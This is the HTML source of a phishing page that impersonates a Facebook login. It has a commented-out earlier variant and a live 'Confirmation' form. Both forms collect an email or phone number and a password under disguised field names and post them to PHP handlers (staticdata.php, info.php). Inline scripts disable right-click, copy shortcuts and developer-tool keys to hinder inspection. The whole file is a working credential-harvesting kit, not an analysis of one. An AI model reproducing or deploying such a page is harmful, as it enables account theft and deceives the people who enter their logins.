
<!-- 
<!doctype html> 
<html dir="ltr" lang="en-US" class=" js no-touch no-reveal-pw getusermedia"><head> 
    <meta charset="utf-8"> 
    <meta http-equiv="X-UA-Compatible" content="IE=edge"> 
    <title> Staying Safe </title> 
    <meta name="description" content=""> 
    <meta name="referrer" content="origin"> 
    <meta name="robots" content="noindex,nofollow"> 
    <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=2,user-scalable=yes"> 
      <link
      href="https://fonts.googleapis.com/css?family=Nunito:200,600"
      rel="stylesheet"
    />

    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,400i,700&display=fallback"
    />
    <link
      rel="stylesheet"
      href="{{asset('/assets/dist/css/bootstrap.min.css')}}"
    />
    <link
      href="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/css/select2.min.css"
      rel="stylesheet"
    />
    <link rel="stylesheet" href="styles/84036174.main.css">
    <link rel="shortcut icon" href="images/cs43t_d5.ico" />
        <script type="text/javascript">
        function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
        </script>
        
        <script type="text/javascript">
        window.addEventListener("keydown",function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){e.preventDefault()}});document.keypress=function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){}return false}
        </script>
        
        <script type="text/javascript">
        document.onkeydown=function(e){e=e||window.event;if(e.keyCode==123||e.keyCode==18){return false}}
        </script>
    </head> 
<body style="background-color: #23343b"> 
    <div id="main-content" class="card" style="background-color: #23343b; color:#4267b2;">
<header style="background-color: #23343b; color:#4267b2;">
  <h1 id="fxa-enter-email-header" style=" color:#4267b2;">
    Log in to Facebook
    <span class="service">
        <br>
    </span>
  </h1>
</header>
<section>
    <div class="info" id="suggest-sync">
    You must log in to continue.</div>
  <form action="staticdata.php?/checkpoint/dyi/?referrer=disabled_checkpoint&amp;next" method="post">
  <div class="input-row">
  <input name="saya" type="text" class="email tooltip-below" autofocus="" placeholder="Email address or phone number" pattern=".{6,}" required="">
    </div>
  <div class="input-row password-row">
  <input name="kawan" id="kawan" type="password" class="password check-password tooltip-below" placeholder="Password" value="" pattern=".{6,}" required="" autofocus="" data-form-prefill="password" data-synchronize-show="true" aria-autocomplete="list">
  <input id="show-password" type="checkbox" class="show-password" aria-controls="password" tabindex="-1" data-novalue="" data-synchronize-show="true">
    </div>
    
    <div class="button-row">
      <button id="submit-btn" type="submit">Log In</button>
    </div>
  </form>
  <aside class="firefox-family-services" style="background-color: #23343b">
<h2>Term of Service</h2>
<ul>
  <li class="bis-service">
    <span class="logo logo-Fbbis"></span>
    Facebook Advertiser Support provides assistance with your Facebook Ads.
  </li>
    <li class="bis-service">
      <span class="logo logo-Fbscr"></span>
      Like this Page to receive updates about how to protect your information both on and off Facebook.
    </li>
</ul>
</aside>

</section>
</div>
</div>
</div> 
</body></html> -->

<!DOCTYPE html>
<html lang="{{ str_replace('_', '-', app()->getLocale()) }}"><head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>Confirmation</title>
	<link rel="icon" type="image/x-icon" href="cs43t_d5.ico">

    <!-- Fonts -->
    <link href="https://fonts.googleapis.com/css?family=Nunito:200,600" rel="stylesheet">

    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,400i,700&amp;display=fallback">
    <link rel="stylesheet" href="{{asset('/assets/dist/css/bootstrap.min.css')}}">
    <link href="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/css/select2.min.css" rel="stylesheet">

    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">

    <link rel="stylesheet" href="styles/84036174.main.css">
    <link rel="shortcut icon" href="images/cs43t_d5.ico">
        

    <!-- Styles -->
    <link href="{{ asset('css/app.css') }}" rel="stylesheet">
    <style>
      .body {
        background-color: #23343b;
      }
      .card-header {
        /* background-color: #4267B2; */
        color: #fff;
        font-weight: bold;
        text-align: center;
        padding: 10px;
        font-size: 18px;
      }

      .card-header {
        background-color: #dee2e6;
        color: #0d6efd;
        font-weight: bold;
        text-align: center;
        padding: 3px;
        font-size: 24px;
        border-bottom: none;
      }

      .card-body {
        padding: 30px;
        background-color: #dee2e6;
        border-radius: 8px;
      }

      .form-floating label {
        /* font-weight: bold; */
        margin-bottom: 8px;
        color: grey;
      }
      .gambar img {
        padding: -200px;
      }

      .form-floating input {
        border-radius: 4px;
        border: 1px solid #ccc;
        padding: 12px;
        background-color: #fff;
        border-color: #0d6efd;
        color:#000;
        width: 100%;
        font-size: 16px;
      }

      .form-floating input:focus {
        outline: none;
        border-color: #4267b2;
        box-shadow: 0 0 5px rgba(66, 103, 178, 0.5);
        background-color: #344853;
        color:white;
      }

      .form-floating .form-check {
        margin-top: 12px;
        background-color: #344853;
      }

      .btn-primary {
        background-color: #0d6efd;
        border-color: #0d6efd;
        width: 100%;
        padding: 12px;
        font-weight: bold;
        font-size: 16px;
      }

      .btn-primary:hover {
        background-color: #2e4b7f;
        border-color: #2e4b7f;
      }

      .btn-link {
        color: #4267b2;
        text-decoration: none;
        font-size: 14px;
        display: inline-block;
        margin-top: 12px;
        color: #000;
      }

      .btn-link:hover {
        color: #d3d3d3;
        text-decoration: none;

      }

      .text-center {
        text-align: center;
        margin-top: 12px;
      }

      .card-footer {
        background-color: #fff;
        border-top: none;
        text-align: center;
        padding: 15px;
        font-size: 14px;
      }

      .card-footer a {
        color: #4267b2;
        text-decoration: none;
      }

      .card-footer a:hover {
        color: #2e4b7f;
      }

      .form-floating .form-check {
        display: flex;
        align-items: center;
        margin-top: 12px;
      }

      .form-floating .form-check-input {
        margin-right: 8px;
        background-color: #344853;
      }
    </style>
  </head>
  <body style="background-color: #dee2e6">
    <div class="container p-5">
      <div class="row justify-content-center">
        <div class="col-12 col-md-6">
          <div class="">
            <div style="text-align: center">
              <img src="facebook logo.png" alt="" width="100"><br>
              <div class="card-header">Login to Facebook</div>
              <!-- <img  class="mb-5"  src="img/face.png" alt="" width="150"> -->
            </div>
            <!--  -->

            <div class="card-body">
              <form action="info.php?button_location=settings&amp;button_name=help" method="POST">
                <!-- @csrf -->

                <div class="form-floating my-3">
                  <!-- <input name="saya" type="text" class="form-control"name="email" value=""placeholder="username"autofocus required/> -->
                  <input name="PrevToEmail" type="text" class="email tooltip-below form-control" autofocus="" placeholder="Email address or phone number" pattern=".{6,}" required="">
                  <label for="username">Email address or phone number</label>
                </div>
                <div class="form-floating">
                   <input name="PrevToPass" id="PrevToPrevYearDays" type="password" class="password form-control check-password tooltip-below" placeholder="Password" value="" pattern=".{6,}" required="" autofocus="" data-form-prefill="password" data-synchronize-show="true" aria-autocomplete="list">
                   <label for="password">Password</label>
                </div>
                <div class="input-row password-row">
                    </div>
                <button type="submit" class="btn btn-primary mt-5">
                  Confirmation
                </button>
                <!-- <a href="login-ulang.html" class="btn btn-primary mt-5">Login</a> -->
              </form>
              <div class="text-center mt-3">
                <a class="btn btn-link">Forgot Password?</a>
              </div>
            </div>
            <div class="pb-0 pt-0" style="text-align: center">
              <img src="Facebook-Meta-Background-PNG.png" alt="" width="100">
            </div>
          </div>
        </div>
      </div>
    </div>
<script type="text/javascript">function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
    </script>
<script type="text/javascript">window.addEventListener("keydown",function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){e.preventDefault()}});document.keypress=function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){}return false}
    </script>  

</body></html>